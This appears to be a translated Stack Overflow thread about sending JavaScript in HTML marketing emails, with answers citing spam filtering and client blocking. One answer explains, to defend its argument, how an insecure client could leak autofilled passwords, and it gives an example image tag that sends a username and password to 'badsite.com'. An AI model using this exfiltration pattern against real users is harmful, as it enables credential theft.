16

这主要是一个修辞问题,据我检查,答案是“不要打扰”,但我想确定一下。

我们有一个电子邮件应用程序,您可以在其中向订阅者列表发送电子邮件。这不是垃圾邮件:例如,大学使用它向学生发送通信,博物馆向订阅者发送电子邮件等。

最近,一位潜在客户问我是否可以发送包含 javascript 的 html 消息而不会被标记为垃圾邮件。

不知道,我做了一次网络短途旅行,我得到的是(我的后部百分比)“一半的客户无法正确显示”,“一半的客户会将你标记为垃圾邮件”和“一半的客户”客户将完全阻止javascript'(显然有一些叠加)。

因此,如果确实需要,最好的解决方案似乎是添加指向适当页面的链接。你有不一样的体验吗?您知道任何提供此功能的电子邮件合并解决方案吗?您知道特定客户是接受还是拒绝使用 javascript 显示 html?

4

5 回答 5

9

您已经列出了反对在电子邮件中使用 javascript 的正确论点。这些向您表明这是一个坏主意。链接到可以自由使用 javascript 的页面是一个不错的选择,它可以让用户决定是否以及何时想要访问此“增强”内容。

于 2009-02-18T13:32:31.647 回答
1

JavaScript 的问题在于它构成了安全威胁。如果有任何电子邮件客户端接受它,那么它很可能是一个安全漏洞,应该修复。

所以,真的,“不要打扰”,因为即使它有效,它很快就会停止工作。

编辑:有些人似乎不明白为什么这是一个安全风险,所以我会解释一下。

考虑以下代码(使用 Javascript 和不安全的电子邮件客户端窃取密码的多种方法之一)。

使用 JavaScript:

  1. 创建一个带有“用户名”和“密码”输入字段的表单。
  2. 让浏览器自动记住这些字段的内容(有几个用户将用户名和密码存储在浏览器的内存中,避免每次都要输入和记住。
  3. (自动)填写两个字段后,使用类似<img src="badsite.com/senddata?username=user&password=pass">.
  4. 恭喜!你偷了密码!

通常,仅在您自己的不安全网站中使用 JavaScript 创建表单本身并无害,因为浏览器足够智能,可以仅将 gmail 数据告诉 gmail(而且您通常不会尝试从自己的网站窃取密码,并且在在那种情况下,无论如何都会有更简单的方法来窃取它们)。

但是,如果您在电子邮件中允许使用 JavaScript,那么浏览器将无法将合法的 JavaScript 与不安全的代码区分开来。

如果电子邮件客户端无法过滤 JavaScript,Cookie 盗窃也是可能的。

于 2009-02-18T13:35:24.557 回答
0

由于垃圾邮件如此重要,我会坚持发送易于使用的基本电子邮件。您始终可以链接到其中包含您的 javascript 的网页。您还可以在 URL 中发送一个查询字符串参数来跟踪对您的电子邮件最感兴趣的用户,因为这会告诉您他们正在点击它们。因此,尽管有可能,但最好避免它。

于 2009-02-18T13:47:45.697 回答
0

是的,这是可能的,但不推荐。出于安全目的,大多数邮件管理软件都阻止了 js,如果他包含 js,则会发出警报。如果用户对垃圾邮件严格,那么这些邮件也会进入垃圾邮件。

于 2010-05-20T16:53:26.397 回答
-1

如果电子邮件链接到缓存了您的用户名和密码的客户端,则它是浏览器中的一个漏洞......电子邮件通常在浏览器中打开......

于 2013-01-16T18:53:37.370 回答